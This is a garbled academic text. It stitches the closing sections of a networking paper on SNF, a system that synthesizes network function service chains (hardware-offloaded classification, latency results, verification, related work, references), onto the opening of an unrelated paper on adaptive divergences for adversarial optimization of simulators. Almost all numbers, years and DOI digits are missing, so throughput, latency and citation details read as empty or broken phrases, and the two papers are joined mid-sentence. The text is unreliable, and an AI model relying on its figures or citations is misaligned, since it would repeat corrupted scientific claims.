bytes) of three different isp-level chains with , , and , rules in their acls. snf’ s classification is of- floaded to an openflow switch, while stateful processing occurs in servers connected to the switch. in- put rates are gbps for the throughput test and gbps for the latency test. matches leads to an unacceptable number of rules. instead, we solve the problem by utilizing a pipeline of flow tables available in the switch. the first two tables match only on the source and destination ports respectively, assign them to ranges, and write metadata that defines the range. further tables include the real acl rules and also match on the metadata previously added to a packet. moreover, since the rules in the nfs are explored in a top-to-bottom order, we emulate the same behavior by assigning decreasing priorities to the openflow rules. we use the same sets of acls as before, and evaluate throughput and latency in the hardware-accelerated snf. we first measure the throughput that snf can achieve leveraging openflow classification. we design an experiment where two machines use a total of four gbps links to send traffic. the packets are crafted so that they uniformly exercise all visible classification rules (some rules from the original data set are fully covered by other rules). we use the same frame sizes as in the ‘real service chain deployments’ section. the switch classifies the packets and forwards them across four snf servers that are using gbps links to connect to the switch. 
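The flow-table pipeline described above (port-range metadata written by the first tables, ACL tables matching on that metadata, and decreasing rule priorities emulating the NFs' top-to-bottom rule order) can be sketched as follows; the rule format and range names are invented for illustration and are not OpenFlow syntax.

    # Toy model of the multi-table classification: the first stage tags the
    # packet with source/destination port-range metadata, later stages hold the
    # ACL rules and match on that metadata.
    PORT_RANGES = [(0, 1023, "well-known"), (1024, 49151, "registered"),
                   (49152, 65535, "ephemeral")]

    def range_id(port):
        for lo, hi, name in PORT_RANGES:
            if lo <= port <= hi:
                return name

    def classify(pkt, acl):
        """acl: list of (src_range, dst_range, action), highest priority first."""
        src_meta, dst_meta = range_id(pkt["src_port"]), range_id(pkt["dst_port"])
        for src_range, dst_range, action in acl:      # emulates decreasing priorities
            if src_range in (src_meta, "*") and dst_range in (dst_meta, "*"):
                return action
        return "drop"

    acl = [("ephemeral", "well-known", "forward-to-server-pool"),
           ("*", "*", "drop")]
    print(classify({"src_port": 51000, "dst_port": 80}, acl))
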
the servers work in two modes: (i) forward only, where they do not implement any nfs and simply forward packets (the first bar in each pair in fig. (a), and (ii) synthesized mode, where they implement the real nf chain (the second bar in each pair in fig. (a). additionally, for comparison, we created an experiment where the switch installs only four basic classification rules (to do simple forwarding) to measure the performance of the nfs themselves (the last pair of bars in fig. (a). we observe that throughput depends mostly on the frame size. the system can operate at almost gbps for small frames (i.e., bytes), and it reaches the full line-rate for -byte frames. interestingly, the rule set size does not affect the throughput. in the real data sets, the second bar in each pair is almost as high as the first one, which shows that the software part of snf does not limit the performance. finally, with simple forwarding rules in the switch (the first pair of bars in fig. (a) the overall throughput is high even for small frames, which confirms that packet processing at the switch is the katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bottleneck of the whole system. to further prove this point, we run an experiment with only ports sending traffic at an aggregate speed of gbps. in this case, snf processes packets at the line-rate except for the smallest frames, where it achieves gbps. latency measurements a middlebox chain should induce low, bounded packet processing delays. in this set of experiments, we send traffic at a lower rate and measure latency. the setup is the same as in the previous scenario. thus, the latency we show includes the time for frames to be: (i) transmitted out of the network interface of the traffic generating machines, (ii) received, processed, and forwarded by the openflow switch, (iii) received, processed, and forwarded by the snf machines, and (iv) received by the destination server (the same machine as the sender). figure b shows the latency depending on the frame size and the synthesized function (results for the input rate of gbps are very similar). our results show that the median latencies are low and stable across all frame sizes and chains. there are several main observations here. first, the th percentiles (marked by the top horizontal line of the boxplots) are close to the median latencies and we find this result to be encouraging. second, large frames (i.e., , bytes) face two times greater median latency than the smaller ones regardless of the rule configuration. third, there are outliers that are an order of magnitude less/greater than the medians (e.g., µs at the st and µs at th percentiles for -byte frames and µs at the st and µs at th percentiles for mtu-sized frames). part of this latency variance is due to the batch i/o and processing techniques of the fastclick framework; as shown in fig. , these techniques offer high throughput, but have a well-studied effect on the latency variance. verification in this section we discuss tools that could potentially be utilized to systematically verify the correctness of the synthesis proposed by snf. recent efforts have employed model checking (canini et al., ; kim et al., a) techniques to explore the (voluminous) state space of modern networked systems in an attempt to find state inconsistencies due to etc. bugs or misconfigurations. 
symbolic execution has also been utilized either alone (kuzniar et al., ; dobrescu & argyraki, ) or combined with model checking (canini et al., ), to systematically identify representative input events (i.e., packets) that can adequately exercise code paths without requiring exhaustive exploration of the input space (hence bounding the verification time). specifically, software dataplane verification (dobrescu & argyraki, ) might be suitable for verifying nfv service chains. dobrescu and argyraki proposed a scalable approach to verifying complex nfv pipelines, by verifying each internal element of the pipeline in isolation; then by composing the results the authors proved certain properties about the entire pipeline. one could use this tool to systematically verify a complex part of snf, which is the traffic classification. however, this tool might not be able to provide sound proofs regarding all the stateful modifications of snf, since the authors verified katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. only two simple stateful cases (i.e., a nat and a traffic monitor) and did not generalize their ideas for a broader list of nfv flow modification elements. soft (kuzniar et al., ) could also be employed to test the interoperability between a chain realized with and without snf. in other words, soft could inject a broad set of inputs to test whether the synthesizednf defined in the ‘abstract service chain representation’ section outputs packets that are identical with the packets delivered by the original set of nfs. similarly, hsa (kazemian, varghese & mckeown, ) could be used to verify loop-freedom, slice isolation, and reachability properties of snf service chains. unfortunately, hsa statically operates on a snapshot of the network configuration, hence is unable to track dynamic state modifications caused by continuous events. soft is a special-purpose verification engine for software-defined networking (sdn) agent implementations. therefore, both works would require significant additional effort to verify stateful nfv pipelines. finally, translating an snf processing graph into a finite state machine understandable by kinetic (kim et al., a) would potentially allow kinetic to use its model checker to verify certain properties for the entire pipeline. however, kinetic does not systematically verify the actual code that runs in the network, but rather builds and verifies a model of this code. therefore, it is unclear (i) whether a kinetic model can sufficiently cover complex service chains such as the isp-level chains presented in the ‘real service chain deployments’ section and (ii) whether kinetic’s located packet equivalence classes (lpecs) can handle the complex tcus of snf without causing state space explosion. to summarize, although the works above have provided remarkable advancements in software verification, a substantial amount of additional research is required to provide strong guarantees about the correctness of snf. for this reason, in this paper we focus our attention on delivering high speed pipelines for complex and stateful nfv service chains and leave the verification of snf as a future work. limitations we do not attempt to provide a solution that can synthesize arbitrary software components, but rather target a broad but finite set of middlebox-specific nfs that operate on the entire space of a packet’s header. 
snf makes two assumptions: ( ) an nfv provider must specify an nf as an ensemble of abstract packet processing elements (i.e., the nf dag defined in the ‘service chain configuration’ section). we believe that this is a reasonable assumption, followed also by other state of the art approaches, such as click, slick, and openbox. however, if a middlebox provider does not want to share this information, under non-disclosure or via a licensing agreement, then snf can synthesize the middleboxes before and after this provider’s middlebox. this is possible by omitting the processing graph of this middlebox from the inputs given to the service chain configurator (see the ‘service chain configuration’ section). ( ) no further decision (i.e., read) utilizes an already rewritten field, therefore, an lb that splits traffic based on source port after a source napt, might not be synthesizable. in such a case, snf can exclude the lb from the synthesis. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. moreover, our tool does not support network-wide placement of the chain’s components, but we envision snf being integrated in controllers, such as e or slick. related work over the last decade, there has been considerable evolution of software-based packet processing architectures that realize wireline throughputs, while providing flexible and cost effective in-cloud network processing. monolithic middlebox implementations. until recently, most nfv approaches have treated nfs as monolithic entities placed at arbitrary locations in the network. in this context, even with the assistance of state of the art oss, such as the click-based clickos (martins et al., ) together with fast network i/o (rizzo, ; dpdk, ) and processing (kim et al., ; kim et al., b; barbette, soldani & mathy, ) mechanisms, chaining more than nfs leads to serious performance degradation as stated by the authors of both clickos and netvm (hwang, ramakrishnan & wood, ). the main reason, as shown in our experiments, for this poor performance is the i/o overhead due to forwarding packets along physically remote and virtualized nfs. more recently, opennetvm (zhang et al., ) showed that vm-based nfv deployments do not scale with increasing number of chained instances, hence opted for nfs running in lightweight docker containers (docker, san francisco, ca, usa) interconnected with shared memory segments. consolidation at the machine level. concentrating network processing into a single machine is a logical way to overcome the limitations stated above. comb (sekar et al., ) consolidates middlebox-oriented flow processing into one machine, mainly at the session layer. similarly, opennf (gember-jacobson et al., ) provides a programming interface to migrate nfs, which can in turn be collocated in a physical server. dpiaas (bremler-barr et al., ) reuses the costly deep packet inspection (dpi) logic across multiple instances. routebricks (dobrescu et al., ) exploits parallelism to scale software routers across multiple servers and cores within a single server, while packetshader (han et al., ) and nba (kim et al., b) take advantage of cheap and powerful auxiliary hardware components (such as gpus) to provide fast packet processing. all of these works only partially exploit the benefits of sharing common middlebox functionality, thus they are far from supporting optimized service chains. 
consolidation at the individual function level is the next level of composition of scalable and efficient nf deployments. in this context, open middleboxes (xomb) by anderson et al. ( ) proposes an incrementally scalable network processing pipeline based on triggers that pass the flow control from one element to another in a pipeline. the xomb architecture allows great flexibility in sharing parts of the pipeline; however, it only targets request-oriented protocols and services, unlike our generic framework. slick (anwer et al., ) operates on the same level of packet processing as snf to compose distributed, network-wide service chains driven by a controller. slick provides its own programming language to achieve this composition and unlike our work, it addresses placement requirements. slick is very efficient when deploying service chains that are not katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. necessarily collocated. however, we argue that in many cases all the nfs of a service chain need to be deployed in one machine to effectively dispatch processing across cores in the same socket. slick does not allow all of the nf elements to be physically placed into a single process. our work goes beyond slick by trading the flexibility of placing nf elements on demand for extensive consolidation of the chain processing. our synthesized snf realizes such chains with zero redundancy of individual packet operations. very recently, bremler-barr, harchol & hay ( ) applied the sdn control and dataplane separation paradigm to openbox; a framework for network-wide deployment and management of nfs. openbox applications input different nf specifications to the openbox controller via a north-bound application programming interface. the controller communicates the nf specifications to the openbox instances (obis) that constitute the actual dataplane, ensuring smart nf placement and scaling. an interesting feature of the openbox controller is its ability to merge different processing graphs, from different nfs, into a single and shorter processing graph, similar to our snf. the authors of openbox made a similar observation with us regarding the need to classify the traffic of a service chain only once, and then apply a set of operations that originate from the different nfs of the chain. however, openbox does not highly optimize the result chain-level processing graph for two reasons: (i) the openbox merge algorithm can only merge homogeneous packet modification elements (i.e., elements with the same type). for example, two ‘‘decrement ip ttl’’ elements, that each decrements the ttl field by one, can be merged into a single element that directly decrements the ttl field by two. imagine, however, the case where openbox has to merge the nfs of fig. . in this example, openbox cannot merge the ‘‘rewrite flow’’ element (that modifies the source and destination ip addresses as well as the source port of udp packets) with the ‘‘decrement ip ttl’’ elements, since these elements do not belong to the same type. this means that the final openbox graph will have distinct packet modification elements (i.e., ‘‘rewrite flow’’ and ‘‘decrement ip ttl’’) and each element has to compute the ip and udp checksums separately. therefore, openbox does not completely eliminate redundant operations. in contrast, snf effectively synthesized the operations of all these elements into a single element (see fig. ) that computes the ip and udp checksums only once. 
consequently, snf produces both a shorter processing graph and a synthesized chain with no redundancy, hence achieving lower latency. (ii) although openbox can merge the classification elements of a chain into a single classifier, the authors have not addressed how they handle the increased complexity of the final classifier. our preliminary experiments showed that in complex use cases, such as the isp-level traffic classification presented in the ‘real service chain deployments’ section, the complexity of the chain-level classifier dramatically increases with increasing number of acl rules. therefore, snf implements the lazy subtraction technique proposed by kazemian, varghese & mckeown ( ). the benefits of this technique are stated in the ‘fastclick extensions’ section. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. finally, the authors of openbox did not stress the limits of the openbox framework in their performance evaluation. an input packet rate of – gbps cannot adequately stress the memory utilization of the obis. moreover, there is limited discussion related to how openbox exploits the multi-core capacities of modern nfv infrastructures. in contrast, in the ‘a chain of routers at the cost of one,’ ‘stateful service chaining’ and ‘real service chain deployments’ sections we demonstrated how snf realizes complex, purely software-based service chains at gbps line-rate. this is possible by exploiting multiple cpu cores and by fitting most of the data of an entire service chain into those cores’ l caches. scheduling nfs for high throughput. recently, the e nfv framework (palkar et al., ) demonstrated a scalable way of deploying nfv services. e mainly tackles placement, elastic scaling, and service composition by introducing pipelets. a pipelet defines a traffic class and a corresponding dag of nfs that should process this traffic class. snf’s tcus are somewhat similar to e ’s pipelets, but snf aims to make them more efficient. concretely, an snf tcu is not processed by a dag of nfs, but rather by a highly optimized piece of code (produced by the synthesizer) that directly applies a set of operations to this specific traffic class. impact. e can use snf to fit more service chains into one machine, hence postpone its elastic scaling. existing approaches can transparently use our extensions to provide services such as (i) lightweight xen vms that run synthesized clickos instances using the netmap network i/o, (ii) parallelized service chains using the multi-server, multi-core routebricks architecture, and (iii) synthesized chains that are load balanced across heterogeneous hardware components (i.e., cpu and gpu) using nba. conclusion we have addressed the problem of synthesizing chains of nfs with snf. snf requires minimal i/o interactions with the nfv platform and applies single-read-single-write operations on the packets, while early-discarding irrelevant traffic classes. snf maintains state across nfs. to realize the above properties, we parse the chained nfs and build a classification graph whose leaves represent unique traffic class units. in each leaf we perform a set of packet header modifications to generate an equivalent configuration that implements the same functionality as the initial chain using a minimal set of elements. snf synthesizes stateful chains that appear in production isp-level networks realizing high throughput and low latency, while outperforming state of the art works. 
additional information and declarations funding the research leading to these results has been co-funded by the european union (eu) in the context of (i) the european research council under eu’s seventh framework programme (fp / - ) / erc grant agreement and (ii) the behavioural based forwarding (beba) project with grant agreement number . there was no katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. competing interests the authors declare there are no competing interests. author contributions • georgios p. katsikas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • marcel enguehard conceived and designed the experiments, performed the computation work, reviewed drafts of the paper. • maciej kuźniar conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • gerald q. maguire jr and dejan kostić wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/gkatsikas/fastclick/tree/snf. references anderson jw, braud r, kapoor r, porter g, vahdat a. . xomb: extensible open middleboxes with commodity servers. in: proceedings of the eighth acm/ieee symposium on architectures for networking and communications systems, ancs ’ . new york, ny, usa: acm, – . anwer b, benson t, feamster n, levin d. . programming slick network functions. in: proceedings of the st acm sigcomm symposium on software defined networking research, sosr ’ . new york, ny, usa: acm, : – : . bagnulo m, matthews p, van beijnum i. . stateful nat : network address and protocol translation from ipv clients to ipv servers. request for comments (rfc) (proposed standard). the internet engineering task force, fremont. available at https://www.rfc-editor.org/rfc/rfc .txt. barbette t, soldani c, mathy l. . fast userspace packet processing. in: proceedings of the eleventh acm/ieee symposium on architectures for networking and communica- tions systems, ancs ’ . piscataway: ieee computer society, – . bremler-barr a, harchol y, hay d. . openbox: a software-defined framework for developing, deploying, and managing network functions. in: proceedings of the conference on acm sigcomm conference, sigcomm ’ . new york: acm, – . katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gkatsikas/fastclick/tree/snf https://www.rfc-editor.org/rfc/rfc .txt http://dx.doi.org/ . /peerj-cs. bremler-barr a, harchol y, hay d, koral y. . deep packet inspection as a service. in: proceedings of the th acm international on conference on emerging networking experiments and technologies, conext ’ . new york: acm, – . canini m, venzano d, perešíni p, kostić d, rexford j. . a nice way to test openflow applications. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, . cisco. . scaling nfv—the performance challenge. 
available at http://blogs.cisco.com/ enterprise/scaling-nfv-the-performance-challenge. dobrescu m, argyraki k. . software dataplane verification. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . dobrescu m, argyraki k, iannaccone g, manesh m, ratnasamy s. . controlling parallelism in a multicore software router. in: proceedings of the workshop on programmable routers for extensible services of tomorrow, sosp ’ . new york: acm, : – : . dobrescu m, egi n, argyraki k, chun b-g, fall k, iannaccone g, knies a, manesh m, ratnasamy s. . routebricks: exploiting parallelism to scale software routers. in: proceedings of the acm sigops nd symposium on operating systems principles. new york: acm, – . dpdk. . data plane development kit (dpdk). available at http://dpdk.org. emmerich p, gallenmüller s, raumer d, wohlfart f, carle g. . moongen: a scriptable high-speed packet generator. in: proceedings of the acm conference on internet measurement conference, imc ’ . new york: acm, – . enguehard m. . hyper-nf: synthesizing chains of virtualized network functions. masters thesis, kth school of information and communication technology (ict) available at http://kth.diva-portal.org/smash/get/diva : /fulltext . european telecommunications standards institute. . nfv whitepaper. available at https://portal.etsi.org/nfv/nfv_white_paper.pdf. evans d. . the internet of things: how the next evolution of the internet is changing everything. cisco internet business solutions group (ibsg), – . available at https: //www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf . gember-jacobson a, viswanathan r, prakash c, grandl r, khalid j, das s, akella a. . opennf: enabling innovation in network function control. in: proceedings of the acm conference on sigcomm, sigcomm ’ . new york: acm, – . han s, jang k, park k, moon s. . packetshader: a gpu-accelerated software router. acm sigcomm computer communication review ( ): – doi . / . . hwang j, ramakrishnan kk, wood t. . netvm: high performance and flexible networking using virtualization on commodity platforms. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . intel. . receiver-side scaling (rss). available at http://www.intel.com/content/dam/ support/us/en/documents/network/sb/ us .pdf. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://dpdk.org http://kth.diva-portal.org/smash/get/diva : /fulltext https://portal.etsi.org/nfv/nfv_white_paper.pdf https://www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf https://www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf http://dx.doi.org/ . / . http://www.intel.com/content/dam/support/us/en/documents/network/sb/ us .pdf http://www.intel.com/content/dam/support/us/en/documents/network/sb/ us .pdf http://dx.doi.org/ . /peerj-cs. katsikas gp. . snf extensions of fastclick’s stateful flow processing elements. available at https://github.com/gkatsikas/fastclick/tree/snf. kazemian p, varghese g, mckeown n. . header space analysis: static checking for networks. in: proceedings of the th usenix conference on networked systems design and implementation. berkeley: usenix association, – . kim h, reich j, gupta a, shahbaz m, feamster n, clark r. a. 
submitted november accepted april published may
corresponding author maxim borisyak, mborisyak@hse.ru
academic editor charles elkan
additional information and declarations can be found on page
doi . /peerj-cs.
copyright borisyak et al. distributed under creative commons cc-by . open access
adaptive divergence for rapid adversarial optimization
maxim borisyak, tatiana gaintseva and andrey ustyuzhanin
laboratory of methods for big data analysis, national research university higher school of economics, moscow, russia
physics department, imperial college, london, united kingdom
abstract
adversarial optimization provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. matching of the distributions is achieved by minimizing a divergence between these distributions, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model to discriminate between these distributions. the choice of the model has its trade-off: high-capacity models provide good estimations of the divergence but, generally, require large sample sizes to be properly trained. in contrast, low-capacity models tend to require fewer samples for training; however, they might provide biased estimations. computational costs of adversarial optimization become significant when sampling from the generator is expensive. one of the practical examples of such settings is fine-tuning parameters of complex computer simulations.
in this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. the variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. the proposed divergence family suggests using low-capacity models to compare distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. thus, it allows for a significant acceleration of the initial stages of optimization. this acceleration was demonstrated on two fine-tuning problems involving the pythia event generator and two of the most popular black-box optimization algorithms: bayesian optimization and variational optimization. experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than jensen-shannon divergence. while we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation.
subjects data mining and machine learning, optimization theory and computation, scientific computing and simulation
keywords adversarial optimization, black-box optimization, computer simulations
introduction
adversarial optimization (ao), introduced in generative adversarial networks (goodfellow et al., ), became popular in many areas of machine learning and beyond, with applications ranging from generative (radford, metz & chintala, ) and inference tasks (dumoulin et al., ), improving image quality (isola et al., ) to tuning stochastic computer simulations (louppe, hermans & cranmer, ). ao provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. matching of the distributions is achieved by minimizing a divergence between these distributions, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model to discriminate between these distributions. the model is referred to as discriminator or critic (for simplicity, we use the term discriminator everywhere below). training a high-capacity model, however, is computationally expensive (metz et al., ) as each step of divergence minimization is accompanied by fitting the discriminator; therefore, adversarial training often requires significantly more computational resources than, for example, a classification model with a comparable architecture of the networks (for instance, compare training times, network capacities and computational resources reported by simonyan & zisserman ( ) and choi et al. ( )). (as a side note: there are ways to estimate gradients of stochastic simulation programs, for example, see baydin et al. ( ); however, all methods known to the authors require training a surrogate, which encounters the problem of the expensive sampling procedures mentioned above.)
nevertheless, in conventional settings like gan, this problem is not pronounced for at least two reasons. firstly, the generator is usually represented by a deep neural network, and sampling is computationally cheap; thus, for properly training the discriminator, a sample of a sufficient size can be quickly drawn. secondly, gan training procedures are often regarded not as minimization of a divergence, but as game-like dynamics (li et al., ; mescheder, geiger & nowozin, ); such dynamics typically employ gradient optimization with small incremental steps, which involve relatively small sample sizes for adapting the previous discriminator to an updated generator configuration. computational costs of ao become significant when sampling from the generator is computationally expensive, or optimization procedure does not operate by performing small incremental steps (metz et al., ). one of the practical examples of such settings is fine-tuning parameters of complex computer simulations. such simulators are usually based on physics laws expressed in computational mathematical forms like differential or stochastic equations. those equations relate input or initial conditions to the observable quantities under conditions of parameters that define physics laws, geometry, or other valuable property of the simulation; these parameters do not depend on inputs or initial conditions. it is not uncommon that such simulations have very high computational complexity. for example, the simulation of a single proton collision event in the cern atlas detector takes several minutes on a single core cpu (the atlas collaboration, ). due to typically high dimensionality, it takes a considerable amount of samples for fine-tuning, which in turn increases the computational burden. another essential property of such computer simulations is the lack of gradient information over the simulation parameters. computations are represented by sophisticated computer programs, which are challenging to differentiate. thus, global black-box optimization methods are often employed; bayesian optimization is one of the most popular approaches. in this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. the variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. the proposed divergence family suggests using low-capacity models to compare borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. thus, it allows for a significant acceleration of the initial stages of optimization. additionally, the proposed family of divergences is broad, which offers a wide range of opportunities for further research. we demonstrate the basic idea with some toy examples, and with a realistic challenge of tuning pythia event generator (sjöstrand, mrenna & skands, ; sjostrand et al., ) following louppe, hermans & cranmer ( ) and ilten, williams & yang ( ). we consider physics-related simulations; nevertheless, all proposed methods are simulation- agnostic. background adversarial optimization, initially introduced for generative adversarial networks (gan) (goodfellow et al., ), offers a general strategy for matching two distributions. 
consider feature space x, ground-truth distribution p, and a parametrized family of distributions q_\psi implicitly defined by a generator with parameters \psi. formally, we wish to find such \psi^*, that p = q_{\psi^*} almost everywhere. ao achieves that by minimizing a divergence or a distance between p and q_\psi with respect to \psi. one of the most popular divergences is jensen–shannon divergence:

\mathrm{jsd}(p, q_\psi) = \tfrac{1}{2}\big[\mathrm{kl}(p \,\|\, m_\psi) + \mathrm{kl}(q_\psi \,\|\, m_\psi)\big] = \tfrac{1}{2}\,\mathbb{E}_{x\sim p}\log\tfrac{p(x)}{m_\psi(x)} + \tfrac{1}{2}\,\mathbb{E}_{x\sim q_\psi}\log\tfrac{q_\psi(x)}{m_\psi(x)}, \quad (1)

where kl is the kullback–leibler divergence and m_\psi(x) = \tfrac{1}{2}\big(p(x) + q_\psi(x)\big).
the main insight of goodfellow et al. ( ) is that jsd can be estimated by training a discriminator f to distinguish between p and q_\psi:

\log 2 - \min_{f\in\mathcal{F}} l(f, p, q_\psi)
= \log 2 - \min_{f\in\mathcal{F}} \Big\{ -\tfrac{1}{2}\,\mathbb{E}_{x\sim p}\log f(x) - \tfrac{1}{2}\,\mathbb{E}_{x\sim q_\psi}\log\big(1 - f(x)\big) \Big\}
= \log 2 + \tfrac{1}{2}\,\mathbb{E}_{x\sim p}\log f^*(x) + \tfrac{1}{2}\,\mathbb{E}_{x\sim q_\psi}\log\big(1 - f^*(x)\big)
= \log 2 + \tfrac{1}{2}\,\mathbb{E}_{x\sim p}\log\tfrac{p(x)}{q_\psi(x) + p(x)} + \tfrac{1}{2}\,\mathbb{E}_{x\sim q_\psi}\log\tfrac{q_\psi(x)}{q_\psi(x) + p(x)}
= \tfrac{1}{2}\,\mathbb{E}_{x\sim p}\log\tfrac{p(x)}{m_\psi(x)} + \tfrac{1}{2}\,\mathbb{E}_{x\sim q_\psi}\log\tfrac{q_\psi(x)}{m_\psi(x)} = \mathrm{jsd}(p, q_\psi), \quad (2)

where l is the cross-entropy loss function, \mathcal{F} = \{f : x \to [0, 1]\} is the set of all possible discriminators, and f^* is the optimal discriminator, f^*(x) = p(x) / \big(p(x) + q_\psi(x)\big). similar formulations also exist for other divergences such as wasserstein (arjovsky, chintala & bottou, ) and cramer (bellemare et al., ) distances.
in classical gan, both generator and discriminator are represented by differentiable neural networks. hence, a subgradient of jsd(p, q_\psi) can be easily computed (goodfellow et al., ). the minimization of the divergence can be performed by a gradient method, and the optimization procedure goes iteratively following these steps:
• using parameters of the discriminator from the previous iteration as an initial guess, adjust f by performing several steps of gradient descent to minimize l(f, p, q_\psi);
• considering f as a constant, compute the gradient of l(f, p, q_\psi) w.r.t. \psi and perform one step of gradient ascent.
for computationally heavy generators, gradients are usually practically unfeasible; therefore, we consider black-box optimization methods. one of the most promising methods for black-box ao is adversarial variational optimization (louppe, hermans & cranmer, ), which combines ao with variational optimization (wierstra et al., ). this method improves upon conventional variational optimization (vo) over jensen–shannon divergence by training a single discriminator to distinguish samples from the ground-truth distribution and samples from a mixture of generators, where the mixture is defined by the search distribution of vo. this eliminates the need to train a classifier for each individual set of parameters drawn from the search distribution. bayesian optimization (bo) (mockus, ) is another commonly used black-box optimization method, with applications including tuning of complex simulations (ilten, williams & yang, ). as we demonstrate in 'experiments', bo can be successfully applied for adversarial optimization.
adaptive divergence
notice that in equation (2) the minimization is carried over the set of all possible discriminators \mathcal{F} = \{f : x \to [0, 1]\}. in practice, this is intractable, and the set \mathcal{F} is approximated by a model such as deep neural networks.
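as a concrete illustration of the estimation identity in equation (2), the following minimal sketch (our own illustration, not code from the paper) trains an off-the-shelf scikit-learn classifier as the discriminator and returns log 2 minus its held-out cross-entropy as a jsd estimate; the classifier choice, the 50/50 validation split and the helper name jsd_estimate are assumptions made here for the example.

import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split

def jsd_estimate(x_p, x_q, model=None):
    # x_p, x_q: equally sized samples drawn from p and from q_psi.
    # The estimate is log(2) minus the validation cross-entropy of a
    # discriminator trained to tell the two samples apart; the better the
    # discriminator approximates the optimal f*, the tighter the estimate.
    X = np.vstack([x_p, x_q])
    y = np.concatenate([np.ones(len(x_p)), np.zeros(len(x_q))])
    X_tr, X_val, y_tr, y_val = train_test_split(X, y, test_size=0.5, stratify=y)
    model = model or GradientBoostingClassifier(n_estimators=100, max_depth=3)
    model.fit(X_tr, y_tr)
    # natural-log cross-entropy, so the maximum attainable value is log(2)
    ce = log_loss(y_val, model.predict_proba(X_val)[:, 1], labels=[0, 1])
    return max(np.log(2.0) - ce, 0.0)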
everywhere below, we use terms ‘low-capacity’ and ‘high-capacity’ to describe the set of feasible discriminator functions: low-capacity models are either represent a narrow set of functions (e.g., logistic regression, shallow decision trees) or are heavily regularized (see ‘implementation’ for more examples of capacity regulation); high-capacity models are sufficient for estimating jsd for an adversarial optimization problem under consideration. in conventional gan settings, the generator is represented by a neural network, sampling is computationally cheap, and usage of high-capacity discriminators is satisfactory. in our case, as was discussed above, simulations tend to be computationally heavy, which, combined with a typically slow convergence of black-box optimization algorithms, might make ao with a high-capacity model practically intractable. the choice of the model has its trade-off: high-capacity models provide good estimations of jsd, but, generally, require large sample sizes to be properly trained. in contrast, low- capacity models tend to require fewer samples for training; however, they might provide biased estimations. for example, if the classifier is represented by a narrow set of functions m ⊆f, then quantity: dm(p,q)= log −min f∈m l(f ,p,q); ( ) borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. might no longer be a divergence, so we refer to it as pseudo-divergence. definition a function d : (x)× (x)→r is a pseudo-divergence, if : (p ) ∀p,q∈ (x) :d(p,q)≥ ; (p ) ∀p,q ∈ (x) : (p = q) ⇒ d(p,q) = ; where (x) —set of all probability distributions on space x . it is tempting to use a pseudo-divergence dm produced by a low-capacity model m for adversarial optimization, however, a pseudo-divergence might not guarantee proper convergence as there might exist such ψ ∈ , that jsd(p,qψ) > , while d(p,qψ)= . for example, naive bayes classifier is unable to distinguish between p and q that have the same marginal distributions. nevertheless, if model m is capable of distinguishing between p and some qψ, dm still provides information about the position of the optimal parameters in the configuration space ψ∗ by narrowing search volume, ilten, williams & yang ( ) offers a good demonstration of this statement. the core idea of this work is to replace jensen–shannon divergence with a so-called adaptive divergence that gradually adjusts model capacity depending on the ‘difficulty’ of the classification problem with the most ‘difficult’ problem being distinguishing between two equal distributions. formally, this gradual increase in model complexity can be captured by the following definitions. definition a family of pseudo-divergences d={dα : (x)× (x)→r|α∈[ , ]} is ordered and complete with respect to jensen–shannon divergence if : (d ) dα is a pseudo-divergence for all α∈[ , ]; (d ) ∀p,q∈ (x) :∀ ≤α <α ≤ :dα (p,q)≤dα (p,q); (d ) ∀p,q∈ (x) :d (p,q)= jsd(p,q). there are numerous ways to construct a complete and ordered w.r.t. jsd family of pseudo-divergences. in the context of adversarial optimization, we consider the following three methods. the 